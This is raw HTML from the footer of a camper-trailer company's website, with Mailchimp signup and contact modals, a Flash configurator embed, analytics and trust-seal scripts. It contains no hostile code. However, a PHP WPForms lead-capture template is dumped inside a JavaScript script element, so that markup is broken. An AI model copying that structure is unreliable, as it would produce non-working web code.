target="_blank"><img id="footer-rental" src="https://happiercamper.com/wp-content/themes/Happier%20Camper/images/footer-rental.png" alt="Rentals" width="125" height="95"><div class="upper bgbl">Rentals Department</div></a> </div> <!-- .rentals --> <div class="col-sm-4 visible-xs brochure upper bgbl"> <a href="/wp-content/themes/Happier%20Camper/pdfs/happier-camper-brochure.pdf" target="_blank"> <span>Download Brochure</span></a> </div> <!-- .brochure --> <div class="col-sm-4 credits"> © 2019 Happier Camper Inc.<br />4178 Chevy Chase Dr., Los Angeles, CA 90039<br>1-844-755-CAMP<br /><a data-toggle="modal" data-target="#subscribeModal" class="upper bgm">- subscribe -</a> </div> <!-- .credits --> <div class="col-sm-4 hidden-xs brochure upper bgbl"> <a href="/wp-content/themes/Happier%20Camper/pdfs/happier-camper-brochure.pdf" target="_blank"><span>Download</span> <img class="logo" alt="Logo" src="https://happiercamper.com/wp-content/themes/Happier%20Camper/images/logo-small-brown.png" width="60" height="46"> <span>Brochure</span></a> </div> <!-- .brochure --> </footer><!-- #colophon --> </div><!-- #page .hfeed .site --> <div class="modal fade" id="mailingModal" tabindex="-1" role="dialog" aria-labelledby="myModalLabel" aria-hidden="true"> <div class="container clearfix"> <div class="row"> <div class="col-sm-6 col-sm-offset-3"> <div class="modal-dialog"> <div class="modal-content"> <div class="modal-header"> <button type="button" class="close" data-dismiss="modal" aria-label="Close"><span aria-hidden="true">&times;</span></button> <h4 class="modal-title bgm upper">Mailing List Sign Up Form</h4> </div> <!-- .modal-header --> <div class="modal-body"> <div id="mc_embed_signup"> <form action="//happiercamper.us8.list-manage.com/subscribe/post?u=f7f756a9375e93d161d1ce9dc&amp;id=c3b235558d" method="post" id="mc-embedded-subscribe-form" name="mc-embedded-subscribe-form" class="validate" target="_blank" novalidate> <div id="mc_embed_signup_scroll"> <div class="form-group"> <input type="email" placeholder="Email Address" name="EMAIL" class="col-sm-12" id="mce-EMAIL"> </div> <!-- .form-group --> <div class="form-group"> <input type="text" placeholder="First Name" name="FNAME" class="col-sm-12" id="mce-FNAME"> </div> <!-- .form-group --> <div class="form-group"> <input type="text" placeholder="Last Name" name="LNAME" class="col-sm-12" id="mce-LNAME"> </div> <!-- .form-group --> <div id="responses" class="clearfix"> <div class="response" id="mce-error-response" style="display:none"></div> <div class="response" id="mce-success-response" style="display:none"></div> </div> <!-- #responses --> <div style="position: absolute; left: -5000px;"> <input type="text" name="b_f7f756a9375e93d161d1ce9dc_e5c7e5f604" tabindex="-1" value=""> </div> <div class="clearfix"> <input class="trans-brown upper bgm" type="submit" value="Subscribe" name="subscribe" id="mc-embedded-subscribe" class="trans"> </div> <!-- .clearfix --> </div> <!-- #mc_embed_signup_scroll --> </form> <!-- #e5c7e5f604 --> </div> <!-- #mc_embed_signup --> <script src='//s3.amazonaws.com/downloads.mailchimp.com/js/mc-validate.js'></script><script type='text/javascript'>(function($) {window.fnames = new Array(); window.ftypes = new Array();fnames[0]='EMAIL';ftypes[0]='email';fnames[1]='FNAME';ftypes[1]='text';fnames[2]='LNAME';ftypes[2]='text';}(jQuery));var $mcj = jQuery.noConflict(true);</script> </div> <!-- .modal-body --> <div class="modal-footer"> <button type="button" class="btn-blue" data-dismiss="modal">Close</button> </div> <!-- .modal-footer --> </div> <!-- .modal-content --> </div> <!-- .modal-dialog --> </div> <!-- .col-sm-4 --> </div> <!-- .row --> </div> <!-- .container .clearfix --> </div> <!-- .modal --> <div class="modal fade" id="contactModal" tabindex="-1" role="dialog" aria-labelledby="myModalLabel" aria-hidden="true"> <div class="container clearfix"> <div class="row"> <div class="col-sm-6 col-sm-offset-3"> <div class="modal-dialog"> <div class="modal-content"> <div class="modal-header"> <button type="button" class="close" data-dismiss="modal" aria-label="Close"><span aria-hidden="true">&times;</span></button> <h4 class="modal-title bgm upper">Send Us A Note</h4> </div> <!-- .modal-header --> <div class="modal-body"> [contact-form-7 id="123" title="Contact form 1"] </div> <!-- .modal-body --> <div class="modal-footer"> <button type="button" class="btn-blue" data-dismiss="modal">Close</button> </div> <!-- .modal-footer --> </div> <!-- .modal-content --> </div> <!-- .modal-dialog --> </div> <!-- .col-sm-4 --> </div> <!-- .row --> </div> <!-- .container .clearfix --> </div> <!-- .modal --> <div class="modal fade" id="subscribeModal" tabindex="-1" role="dialog" aria-labelledby="myModalLabel" aria-hidden="true"> <div class="container clearfix"> <div class="row"> <div class="col-sm-6 col-sm-offset-3"> <div class="modal-dialog"> <div class="modal-content"> <div class="modal-header"> <button type="button" class="close" data-dismiss="modal" aria-label="Close"><span aria-hidden="true">&times;</span></button> <h4 class="modal-title bgm upper">Join the Mailing List</h4> </div> <!-- .modal-header --> <div class="modal-body"> <form action="//happiercamper.us8.list-manage.com/subscribe/post?u=f7f756a9375e93d161d1ce9dc&amp;id=c3b235558d" method="post" id="mc-embedded-subscribe-form" name="mc-embedded-subscribe-form" class="validate" target="_blank" novalidate> <div id="mc_embed_signup_scroll"> <div class="form-group"> <input type="email" placeholder="Email Address" name="EMAIL" class="col-sm-12" id="mce-EMAIL"> </div> <!-- .form-group --> <div class="form-group"> <input type="text" placeholder="First Name" name="FNAME" class="col-sm-12" id="mce-FNAME"> </div> <!-- .form-group --> <div class="form-group"> <input type="text" placeholder="Last Name" name="LNAME" class="col-sm-12" id="mce-LNAME"> </div> <!-- .form-group --> <div id="responses" class="clearfix"> <div class="response" id="mce-error-response" style="display:none"></div> <div class="response" id="mce-success-response" style="display:none"></div> </div> <!-- #responses --> <div style="position: absolute; left: -5000px;"> <input type="text" name="b_f7f756a9375e93d161d1ce9dc_e5c7e5f604" tabindex="-1" value=""> </div> <div class="clearfix"> <input class="trans-blue upper bgm" type="submit" value="Subscribe" name="subscribe" id="mc-embedded-subscribe" class="trans"> </div> <!-- .clearfix --> </div> <!-- #mc_embed_signup_scroll --> </form> <!-- #e5c7e5f604 --> <script src='//s3.amazonaws.com/downloads.mailchimp.com/js/mc-validate.js'></script><script type='text/javascript'>(function($) {window.fnames = new Array(); window.ftypes = new Array();fnames[0]='EMAIL';ftypes[0]='email';fnames[1]='FNAME';ftypes[1]='text';fnames[2]='LNAME';ftypes[2]='text';fnames[3]='MMERGE3';ftypes[3]='phone';fnames[4]='MMERGE4';ftypes[4]='zip';}(jQuery));var $mcj = jQuery.noConflict(true);</script> </div> <!-- .modal-body --> <div class="modal-footer"> <button type="button" class="btn-white" data-dismiss="modal">Close</button> </div> <!-- .modal-footer --> </div> <!-- .modal-content --> </div> <!-- .modal-dialog --> </div> <!-- .col-sm-4 --> </div> <!-- .row --> </div> <!-- .container .clearfix --> </div> <!-- .modal --> <div class="modal fade" id="preorderModal" tabindex="-1" role="dialog" aria-labelledby="myModalLabel" aria-hidden="true"> <div class="container clearfix"> <div class="row"> <div class="col-sm-6 col-sm-offset-3"> <div class="modal-dialog"> <div class="modal-content"> <div class="modal-header"> <button type="button" class="close" data-dismiss="modal" aria-label="Close"><span aria-hidden="true">&times;</span></button> <h4 class="modal-title bgm upper">Pre-Order List Sign Up Form</h4> </div> <!-- .modal-header --> <div class="modal-body"> <div id="mc_embed_signup"> <form action="//tumblr.us8.list-manage.com/subscribe/post?u=f7f756a9375e93d161d1ce9dc&amp;id=e5c7e5f604" method="post" id="mc-embedded-subscribe-form" name="mc-embedded-subscribe-form" class="validate" target="_blank" novalidate> <div id="mc_embed_signup_scroll"> <div class="form-group"> <input type="email" placeholder="Email Address" name="EMAIL" class="col-sm-12" id="mce-EMAIL"> </div> <!-- .form-group --> <div class="form-group"> <input type="text" placeholder="First Name" name="FNAME" class="col-sm-12" id="mce-FNAME"> </div> <!-- .form-group --> <div class="form-group"> <input type="text" placeholder="Last Name" name="LNAME" class="col-sm-12" id="mce-LNAME"> </div> <!-- .form-group --> <label for="mce-MMERGE3">Phone Number </label> <div class="phonefield phonefield-us"> (<span class="phonearea"><input class="phonepart " pattern="[0-9]*" id="mce-MMERGE3-area" name="MMERGE3[area]" maxlength="3" size="3" value="" type="text"></span>) <span class="phonedetail1"><input class="phonepart " pattern="[0-9]*" id="mce-MMERGE3-detail1" name="MMERGE3[detail1]" maxlength="3" size="3" value="" type="text"></span> - <span class="phonedetail2"><input class="phonepart " pattern="[0-9]*" id="mce-MMERGE3-detail2" name="MMERGE3[detail2]" maxlength="4" size="4" value="" type="text"></span> <span class="small-meta nowrap">(###) ###-####</span> </div> <div class="form-group"> <input type="text" placeholder="Zip Code" name="MMERGE4" class="col-sm-12" id="mce-MMERGE4"> </div> <!-- .form-group --> <div id="responses" class="clearfix"> <div class="response" id="mce-error-response" style="display:none"></div> <div class="response" id="mce-success-response" style="display:none"></div> </div> <!-- #responses --> <div style="position: absolute; left: -5000px;"> <input type="text" name="b_f7f756a9375e93d161d1ce9dc_e5c7e5f604" tabindex="-1" value=""> </div> <div class="clearfix"> <input class="col-sm-4 col-sm-offset-4 upper" type="submit" value="Subscribe" name="subscribe" id="mc-embedded-subscribe" class="trans"> </div> <!-- .clearfix --> </div> <!-- #mc_embed_signup_scroll --> </form> <!-- #e5c7e5f604 --> </div> <!-- #mc_embed_signup --> <script src='//s3.amazonaws.com/downloads.mailchimp.com/js/mc-validate.js'></script><script type='text/javascript'>(function($) {window.fnames = new Array(); window.ftypes = new Array();fnames[0]='EMAIL';ftypes[0]='email';fnames[1]='FNAME';ftypes[1]='text';fnames[2]='LNAME';ftypes[2]='text';fnames[3]='MMERGE3';ftypes[3]='phone';fnames[4]='MMERGE4';ftypes[4]='zip';}(jQuery));var $mcj = jQuery.noConflict(true);</script> </div> <!-- .modal-body --> <div class="modal-footer"> <button type="button" class="btn-blue" data-dismiss="modal">Close</button> </div> <!-- .modal-footer --> </div> <!-- .modal-content --> </div> <!-- .modal-dialog --> </div> <!-- .col-sm-4 --> </div> <!-- .row --> </div> <!-- .container .clearfix --> </div> <!-- .modal --> <div class="modal fade" id="configuraterModal" tabindex="-1" role="dialog" aria-labelledby="myModalLabel" aria-hidden="true"> <div class="modal-dialog"> <div class="modal-content"> <div class="modal-header"> <button type="button" class="close" data-dismiss="modal" aria-label="Close"><span aria-hidden="true">&times;</span></button> <h4 class="modal-title" id="myModalLabel">HC1 ADAPTIVE CONFIGURATER</h4> </div> <div class="modal-body"> <div id="flashContent"> <object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" width="100%" height="100%" id="adaptiv_app" align="middle"> <param name="movie" value="https://happiercamper.com/wp-content/themes/Happier%20Camper/inc/adaptiv_app.swf" /> <param name="quality" value="high" /> <param name="bgcolor" value="#ffffff" /> <param name="play" value="true" /> <param name="loop" value="true" /> <param name="wmode" value="window" /> <param name="scale" value="noscale" /> <param name="menu" value="true" /> <param name="devicefont" value="false" /> <param name="salign" value="" /> <param name="allowScriptAccess" value="sameDomain" /> <!--[if !IE]>--> <object type="application/x-shockwave-flash" data="https://happiercamper.com/wp-content/themes/Happier%20Camper/inc/adaptiv_app.swf" width="100%" height="100%"> <param name="movie" value="https://happiercamper.com/wp-content/themes/Happier%20Camper/inc/adaptiv_app.swf" /> <param name="quality" value="high" /> <param name="bgcolor" value="#ffffff" /> <param name="play" value="true" /> <param name="loop" value="true" /> <param name="wmode" value="window" /> <param name="scale" value="noscale" /> <param name="menu" value="true" /> <param name="devicefont" value="false" /> <param name="salign" value="" /> <param name="allowScriptAccess" value="sameDomain" /> <!--<![endif]--> <a href="http://www.adobe.com/go/getflash"><img src="http://www.adobe.com/images/shared/download_buttons/get_flash_player.gif" alt="Get Adobe Flash player" /></a> <!--[if !IE]>--> </object> <!--<![endif]--> </object> </div> </div> <div class="modal-footer"> <button type="button" class="btn btn-default" data-dismiss="modal">Close</button> </div> </div> </div> </div> <script type="text/javascript"> (function() { var sa = document.createElement('script'); sa.type = 'text/javascript'; sa.async = true; sa.src = ('https:' == document.location.protocol ? 'https://cdn' : 'http://cdn') + '.ywxi.net/js/1.js'; var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(sa, s); })(); </script><script> (function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){ (i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o), m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m) })(window,document,'script','//www.google-analytics.com/analytics.js','ga'); ga('create', 'UA-59971024-1', 'auto'); ga('send', 'pageview'); if ( class_exists( 'WPForms_Template', false ) ) : /** * HC Lead Capture * Template for WPForms. */ class WPForms_Template_hc_lead_capture extends WPForms_Template { /** * Primary class constructor. * * @since 1.0.0 */ public function init() { // Template name $this->name = 'HC Lead Capture'; // Template slug $this->slug = 'hc_lead_capture'; // Template description $this->description = ''; // Template field and settings $this->data = array ( 'field_id' => 21, 'fields' => array ( 9 => array ( 'id' => '9', 'type' => 'name', 'label' => 'Name', 'format' => 'first-last', 'required' => '1', 'size' => 'medium', ), 8 => array ( 'id' => '8', 'type' => 'email', 'label' => 'Email', 'required' => '1', 'size' => 'medium', ), 4 => array ( 'id' => '4', 'type' => 'select', 'label' => 'Country', 'choices' => array ( 1 => array ( 'label' => 'United States', ), 2 => array ( 'label' => 'Canada', ), 3 => array ( 'label' => 'United Kingdom', ), 4 => array ( 'label' => 'Japan', ), 5 => array ( 'label' => 'Other', ), ), 'required' => '1', 'size' => 'medium', ), 5 => array ( 'id' => '5', 'type' => 'select', 'label' => 'State', 'choices' => array ( 4 => array ( 'label' => 'AL', ), 5 => array ( 'label' => 'AK', ), 6 => array ( 'label' => 'AZ', ), 7 => array ( 'label' => 'AR', ), 11 => array ( 'label' => 'CA', ), 12 => array ( 'label' => 'CO', ), 13 => array ( 'label' => 'CT', ), 14 => array ( 'label' => 'DE', ), 15 => array ( 'label' => 'DC', ), 16 => array ( 'label' => 'FL', ), 17 => array ( 'label' => 'GA', ), 18 => array ( 'label' => 'HI', ), 19 => array ( 'label' => 'ID', ), 20 => array ( 'label' => 'IL', ), 21 => array ( 'label' => 'IN', ), 22 => array ( 'label' => 'IA', ), 23 => array ( 'label' => 'KS', ), 24 => array ( 'label' => 'KY', ), 25 => array ( 'label' => 'LA', ), 26 => array ( 'label' => 'ME', ), 27 => array ( 'label' => 'MD', ), 28 => array ( 'label' => 'MA', ), 29 => array ( 'label' => 'MI', ), 30 => array ( 'label' => 'MN', ), 31 => array ( 'label' => 'MS', ), 32 => array ( 'label' => 'MO', ), 33 => array ( 'label' => 'MT', ), 34 => array ( 'label' => 'NE', ), 35 => array ( 'label' => 'NV', ), 36 => array ( 'label' => 'NH', ), 37 => array ( 'label' => 'NJ', ), 38 => array ( 'label' => 'NM', ), 39 => array ( 'label' => 'NY', ), 40 => array ( 'label' => 'NC', ), 41 => array ( 'label' => 'ND', ), 42 => array ( 'label' => 'OH', ), 43 => array ( 'label' => 'OK', ), 44 => array ( 'label' => 'OR', ), 45 => array ( 'label' => 'PA', ), 46 => array ( 'label' => 'RI', ), 47 => array ( 'label' => 'SC', ), 48 => array ( 'label' => 'SD', ), 49 => array ( 'label' => 'TN', ), 50 => array ( 'label' => 'TX', ), 51 => array ( 'label' => 'UT', ), 52 => array ( 'label' => 'VT', ), 53 => array ( 'label' => 'VA', ), 54 => array ( 'label' => 'WA', ), 55 => array ( 'label' => 'WV', ), 56 => array ( 'label' => 'WI', ), 57 => array ( 'label' => 'WY', ), ), 'required' => '1', 'size' => 'medium', 'conditional_logic' => '1', 'conditional_type' => 'show', 'conditionals' => array ( 0 => array ( 0 => array ( 'field' => '4', 'operator' => '==', 'value' => '1', ), ), ), ), 6 => array ( 'id' => '6', 'type' => 'select', 'label' => 'Province', 'choices' => array ( 4 => array ( 'label' => 'AB', ), 5 => array ( 'label' => 'BC', ), 6 => array ( 'label' => 'MB', ), 7 => array ( 'label' => 'NB', ), 8 => array ( 'label' => 'NL', ), 9 => array ( 'label' => 'NT', ), 10 => array ( 'label' => 'NS', ), 11 => array ( 'label' => 'NU', ), 12 => array ( 'label' => 'ON', ), 13 => array ( 'label' => 'PE', ), 14 => array ( 'label' => 'QC', ), 15 => array ( 'label' => 'SK', ), 16 => array ( 'label' => 'YT', ), ), 'required' => '1', 'size' => 'medium', 'conditional_logic' => '1', 'conditional_type' => 'show', 'conditionals' => array ( 0 => array ( 0 => array ( 'field' => '4', 'operator' => '==', 'value' => '2', ), ), ), ), 17 => array ( 'id' => '17', 'type' => 'select', 'label' => 'Prefecture', 'choices' => array ( 4 => array ( 'label' => 'Aichi', ), 5 => array ( 'label' => 'Akita', ), 6 => array ( 'label' => 'Aomori', ), 7 => array ( 'label' => 'Chiba', ), 8 => array ( 'label' => 'Ehime', ), 9 => array ( 'label' => 'Fukui', ), 10 => array ( 'label' => 'Fukuoka', ), 11 => array ( 'label' => 'Fukushima', ), 12 => array ( 'label' => 'Gifu', ), 13 => array ( 'label' => 'Gunma', ), 14 => array ( 'label' => 'Hiroshima', ), 15 => array ( 'label' => 'Hokkaido', ), 16 => array ( 'label' => 'Hyōgo', ), 17 => array ( 'label' => 'Ibaraki', ), 18 => array ( 'label' => 'Ishikawa', ), 19 => array ( 'label' => 'Iwate', ), 20 => array ( 'label' => 'Kagawa', ), 21 => array ( 'label' => 'Kagoshima', ), 22 => array ( 'label' => 'Kanagawa', ), 23 => array ( 'label' => 'Kōchi', ), 24 => array ( 'label' => 'Kumamoto', ), 25 => array ( 'label' => 'Kyoto', ), 26 => array ( 'label' => 'Mie', ), 27 => array ( 'label' => 'Miyagi', ), 28 => array ( 'label' => 'Miyazaki', ), 29 => array ( 'label' => 'Nagano', ), 30 => array ( 'label' => 'Nagasaki', ), 31 => array ( 'label' => 'Nara', ), 32 => array ( 'label' => 'Niigata', ), 33 => array ( 'label' => 'Ōita', ), 34 => array ( 'label' => 'Okayama', ), 35 => array ( 'label' => 'Okinawa', ), 36 => array ( 'label' => 'Osaka', ), 37 => array ( 'label' => 'Saga', ), 38 => array ( 'label' => 'Saitama', ), 39 => array ( 'label' => 'Shiga', ), 40 => array ( 'label' => 'Shimane', ), 41 => array ( 'label' => 'Shizuoka', ), 42 => array ( 'label' => 'Tochigi', ), 43 => array ( 'label' => 'Tokushima', ), 44 => array ( 'label' => 'Tokyo', ), 45 => array ( 'label' => 'Tottori', ), 46 => array ( 'label' => 'Toyama', ), 47 => array ( 'label' => 'Wakayama', ), 48 => array ( 'label' => 'Yamagata', ), 49 => array ( 'label' => 'Yamaguchi', ), 50 => array ( 'label' => 'Yamanashi', ), ), 'required' => '1', 'size' => 'medium', 'conditional_logic' => '1', 'conditional_type' => 'show', 'conditionals' => array ( 0 => array ( 0 => array ( 'field' => '4', 'operator' => '==', 'value' => '4', ), ), ), ), 18 => array ( 'id' => '18', 'type' => 'select', 'label' => 'County', 'choices' => array ( 4 => array ( 'label' => 'Channel Islands - Alderney', ), 5 => array ( 'label' => 'Channel Islands - Guernsey', ), 6 => array ( 'label' => 'Channel Islands - Jersey', ), 7 => array ( 'label' => 'Channel Islands - Sark', ), 8 => array ( 'label' => 'England - Avon', ), 9 => array ( 'label' => 'England - Bedfordshire', ), 10 => array ( 'label' => 'England - Berkshire', ), 11 => array ( 'label' => 'England - Buckinghamshire', ), 12 => array ( 'label' => 'England - Cambridgeshire', ), 13 => array ( 'label' => 'England - Cheshire', ), 14 => array ( 'label' => 'England - Cleveland', ), 15 => array ( 'label' => 'England - Co. Durham', ), 16 => array ( 'label' => 'England - Cornwall', ), 17 => array ( 'label' => 'England - Cumberland', ), 18 => array ( 'label' => 'England - Cumbria', ), 19 => array ( 'label' => 'England - Derbyshire', ), 20 => array ( 'label' => 'England - Devon', ), 21 => array ( 'label' => 'England - Dorset', ), 22 => array ( 'label' => 'England - East Riding of Yorkshire', ), 23 => array ( 'label' => 'England - East Sussex', ), 24 => array ( 'label' => 'England - Essex', ), 25 => array ( 'label' => 'England - Gloucestershire', ), 26 => array ( 'label' => 'England - Greater Manchester', ), 27 => array ( 'label' => 'England - Hampshire', ), 28 => array ( 'label' => 'England - Hereford and Worcester', ), 29 => array ( 'label' => 'England - Herefordshire', ), 30 => array ( 'label' => 'England - Hertfordshire', ), 31 => array ( 'label' => 'England - Huntingdonshire', ), 32 => array ( 'label' => 'England - Isle of Wight', ), 33 => array ( 'label' => 'England - Kent', ), 34 => array ( 'label' => 'England - Lancashire', ), 35 => array ( 'label' => 'England - Leicestershire', ), 36 => array ( 'label' => 'England - Lincolnshire', ), 37 => array ( 'label' => 'England - London', ), 38 => array ( 'label' => 'England - Merseyside', ), 39 => array ( 'label' => 'England - Middlesex', ), 40 => array ( 'label' => 'England - Norfolk', ), 41 => array ( 'label' => 'England - North Riding of Yorkshire', ), 42 => array ( 'label' => 'England - North Yorkshire', ), 43 => array ( 'label' => 'England - Northamptonshire', ), 44 => array ( 'label' => 'England - Northumberland', ), 45 => array ( 'label' => 'England - Nottinghamshire', ), 46 => array ( 'label' => 'England - Oxfordshire', ), 47 => array ( 'label' => 'England - Rutland', ), 48 => array ( 'label' => 'England - Shropshire', ), 49 => array ( 'label' => 'England - Somerset', ), 50 => array ( 'label' => 'England - South Yorkshire', ), 51 => array ( 'label' => 'England - Staffordshire', ), 52 => array ( 'label' => 'England - Suffolk', ), 53 => array ( 'label' => 'England - Surrey', ), 54 => array ( 'label' => 'England - Sussex', ), 55 => array ( 'label' => 'England - Tyne and Wear', ), 56 => array ( 'label' => 'England - Warwickshire', ), 57 => array ( 'label' => 'England - West Sussex', ), 58 => array ( 'label' => 'England - West Yorkshire', ), 59 => array ( 'label' => 'England - Westmorland', ), 60 => array ( 'label' => 'England - Wiltshire', ), 61 => array ( 'label' => 'England - Yorkshire', ), 62 => array ( 'label' => 'Ireland - Co. Carlow', ), 63 => array ( 'label' => 'Ireland - Co. Cavan', ), 64 => array ( 'label' => 'Ireland - Co. Clare', ), 65 => array ( 'label' => 'Ireland - Co. Cork', ), 66 => array ( 'label' => 'Ireland - Co. Donegal', ), 67 => array ( 'label' => 'Ireland - Co. Dublin', ), 68 => array ( 'label' => 'Ireland - Co. Galway', ), 69 => array ( 'label' => 'Ireland - Co. Kerry', ), 70 => array ( 'label' => 'Ireland - Co. Kildare', ), 71 => array ( 'label' => 'Ireland - Co. Kilkenny', ), 72 => array ( 'label' => 'Ireland - Co. Laois', ), 73 => array ( 'label' => 'Ireland - Co. Leitrim', ), 74 => array ( 'label' => 'Ireland - Co. Limerick', ), 75 => array ( 'label' => 'Ireland - Co. Longford', ), 76 => array ( 'label' => 'Ireland - Co. Louth', ), 77 => array ( 'label' => 'Ireland - Co. Mayo', ), 78 => array ( 'label' => 'Ireland - Co. Meath', ), 79 => array ( 'label' => 'Ireland - Co. Monaghan', ), 80 => array ( 'label' => 'Ireland - Co. Offaly', ), 81 => array ( 'label' => 'Ireland - Co. Roscommon', ), 82 => array ( 'label' => 'Ireland - Co. Sligo', ), 83 => array ( 'label' => 'Ireland - Co. Tipperary', ), 84 => array ( 'label' => 'Ireland - Co. Waterford', ), 85 => array ( 'label' => 'Ireland - Co. Westmeath', ), 86 => array ( 'label' => 'Ireland - Co. Wexford', ), 87 => array ( 'label' => 'Ireland - Co. Wicklow', ), 88 => array ( 'label' => 'Northern Ireland - Co. Antrim', ), 89 => array ( 'label' => 'Northern Ireland - Co. Armagh', ), 90 => array ( 'label' => 'Northern Ireland - Co. Fermanagh', ), 91 => array ( 'label' => 'Northern Ireland - Co. Londonderry', ), 92 => array ( 'label' => 'Northern Ireland - Co. Tyrone', ), 93 => array ( 'label' => 'Scotland - Aberdeenshire', ), 94 => array ( 'label' => 'Scotland - Angus', ), 95 => array ( 'label' => 'Scotland - Argyllshire', ), 96 => array ( 'label' => 'Scotland - Ayrshire', ), 97 => array ( 'label' => 'Scotland - Banffshire', ), 98 => array ( 'label' => 'Scotland - Berwickshire', ), 99 => array ( 'label' => 'Scotland - Borders', ), 100 => array ( 'label' => 'Scotland - Bute', ), 101 => array ( 'label' => 'Scotland - Caithness', ), 102 => array ( 'label' => 'Scotland - Central', ), 103 => array ( 'label' => 'Scotland - Clackmannanshire', ), 104 => array ( 'label' => 'Scotland - Dumfries and Galloway', ), 105 => array ( 'label' => 'Scotland - Dumfries-shire', ), 106 => array ( 'label' => 'Scotland - Dunbartonshire', ), 107 => array ( 'label' => 'Scotland - East Lothian', ), 108 => array ( 'label' => 'Scotland - Fife', ), 109 => array ( 'label' => 'Scotland - Grampian', ), 110 => array ( 'label' => 'Scotland - Highland', ), 111 => array ( 'label' => 'Scotland - Inverness-shire', ), 112 => array ( 'label' => 'Scotland - Kincardineshire', ), 113 => array ( 'label' => 'Scotland - Kinross-shire', ), 114 => array ( 'label' => 'Scotland - Kirkcudbrightshire', ), 115 => array ( 'label' => 'Scotland - Lanarkshire', ), 116 => array ( 'label' => 'Scotland - Lothian', ), 117 => array ( 'label' => 'Scotland - Midlothian', ), 118 => array ( 'label' => 'Scotland - Morayshire', ), 119 => array ( 'label' => 'Scotland - Nairn', ), 120 => array ( 'label' => 'Scotland - Orkney', ), 121 => array ( 'label' => 'Scotland - Peebles-shire', ), 122 => array ( 'label' => 'Scotland - Perth', ), 123 => array ( 'label' => 'Scotland - Renfrewshire', ), 124 => array ( 'label' => 'Scotland - Ross and Cromarty', ), 125 => array ( 'label' => 'Scotland - Roxburghshire', ), 126 => array ( 'label' => 'Scotland - Selkirkshire', ), 127 => array ( 'label' => 'Scotland - Shetland', ), 128 => array ( 'label' => 'Scotland - Stirlingshire', ), 129 => array ( 'label' => 'Scotland - Strathclyde', ), 130 => array ( 'label' => 'Scotland - Sutherland', ), 131 => array ( 'label' => 'Scotland - Tayside', ), 132 => array ( 'label' => 'Scotland - West Lothian', ), 133 => array ( 'label' => 'Scotland - Western Isles', ), 134 => array ( 'label' => 'Scotland - Wigtownshire', ), 135 => array ( 'label' => 'Wales - Anglesey', ), 136 => array ( 'label' => 'Wales - Breconshire', ), 137 => array ( 'label' => 'Wales - Caernarvonshire', ), 138 => array ( 'label' => 'Wales - Cardiganshire', ), 139 => array ( 'label' => 'Wales - Carmarthenshire', ), 140 => array ( 'label' => 'Wales - Denbighshire', ), 141 => array ( 'label' => 'Wales - Dyfed', ), 142 => array ( 'label' => 'Wales - Flintshire', ), 143 => array ( 'label' => 'Wales - Glamorgan', ), 144 => array ( 'label' => 'Wales - Gwent', ), 145 => array ( 'label' => 'Wales - Merionethshire', ), 146 => array ( 'label' => 'Wales - Mid Glamorgan', ), 147 => array ( 'label' => 'Wales - Monmouthshire', ), 148 => array ( 'label' => 'Wales - Montgomeryshire', ), 149 => array ( 'label' => 'Wales - Pembrokeshire', ), 150 => array ( 'label' => 'Wales - Powys', ), 151 => array ( 'label' => 'Wales - Radnorshire', ), 152 => array ( 'label' => 'Wales - South Glamorgan', ), 153 => array ( 'label' => 'Wales - West Glamorgan', ), 154 => array ( 'label' => 'England - Humberside', ), 155 => array ( 'label' => 'England - West Midlands', ), 156 => array ( 'label' => 'England - West Riding of Yorkshire', ), 157 => array ( 'label' => 'England - Worcestershire', ), 158 => array ( 'label' => 'Northern Ireland - Co. Down', ), 159 => array ( 'label' => 'Wales - Clwyd', ), 160 => array ( 'label' => 'Wales - Gwynedd', ), ), 'required' => '1', 'size' => 'medium', 'conditional_logic' => '1', 'conditional_type' => 'show', 'conditionals' => array ( 0 => array ( 0 => array ( 'field' => '4', 'operator' => '==', 'value' => '3', ), ), ), ), 7 => array ( 'id' => '7', 'type' => 'text', 'label' => 'Postal / Zip Code', 'required' => '1', 'size' => 'medium', ), 11 => array ( 'id' => '11', 'type' => 'text', 'label' => 'Telephone', 'size' => 'medium', ), 10 => array ( 'id' => '10', 'type' => 'textarea', 'label' => 'Comments', 'size' => 'medium', ), 20 => array ( 'id' => '20', 'type' => 'checkbox', 'choices' => array ( 1 => array ( 'default' => '1', 'label' => 'Sign-up for email', ), ), 'choices_images_style' => 'modern', ), 12 => array ( 'id' => '12', 'type' => 'html', 'label_disable' => '1', 'conditional_logic' => '1', 'conditional_type' => 'hide', 'conditionals' => array ( 0 => array ( 0 => array ( 'field' => '5', 'operator' => '==', 'value' => '13', ), ), 1 => array ( 0 => array ( 'field' => '5', 'operator' => '==', 'value' => '14', ), ), 2 => array ( 0 => array ( 'field' => '5', 'operator' => '==', 'value' => '28', ), ), 3 => array ( 0 => array ( 'field' => '5', 'operator' => '==', 'value' => '27', ), ), 4 => array ( 0 => array ( 'field' => '5', 'operator' => '==', 'value' => '36', ), ), 5 => array ( 0 => array ( 'field' => '5', 'operator' => '==', 'value' => '37', ), ), 6 => array ( 0 => array ( 'field' => '5', 'operator' => '==', 'value' => '39', ), ), 7 => array ( 0 => array ( 'field' => '5', 'operator' => '==', 'value' => '45', ), ), 8 => array ( 0 => array ( 'field' => '5', 'operator' => '==', 'value' => '46', ), ), 9 => array ( 0 => array ( 'field' => '5', 'operator' => '==', 'value' => '53', ), ), 10 => array ( 0 => array ( 'field' => '5', 'operator' => '==', 'value' => '52', ), ), ), ), ), 'settings' => array ( 'form_title' => 'HC Lead Capture', 'submit_text' => 'Submit', 'submit_text_processing' => 'Submitting your information...', 'honeypot' => '1', 'notification_enable' => '1', 'notifications' => array ( 2 => array ( 'notification_name' => 'All Leads', 'email' => '[email protected]', 'subject' => 'New Web Lead Submission', 'sender_name' => 'HCHQ Lead Capture', 'sender_address' => '{admin_email}', 'message' => '{all_fields}', ), ), 'confirmations' => array ( 1 => array ( 'name' => 'Default Confirmation', 'type' => 'message', 'message' => '<p>Thanks for contacting us! We will be in touch with you shortly.</p>', 'message_scroll' => '1', 'page' => '257', ), ), ), 'meta' => array ( 'template' => 'hc_lead_capture', ), ); } } new WPForms_Template_hc_lead_capture; endif; </script> <script type='text/javascript' src='https://happiercamper.com/wp-content/plugins/bj-lazy-load/js/bj-lazy-load.min.js?ver=2'></script> <script type='text/javascript' 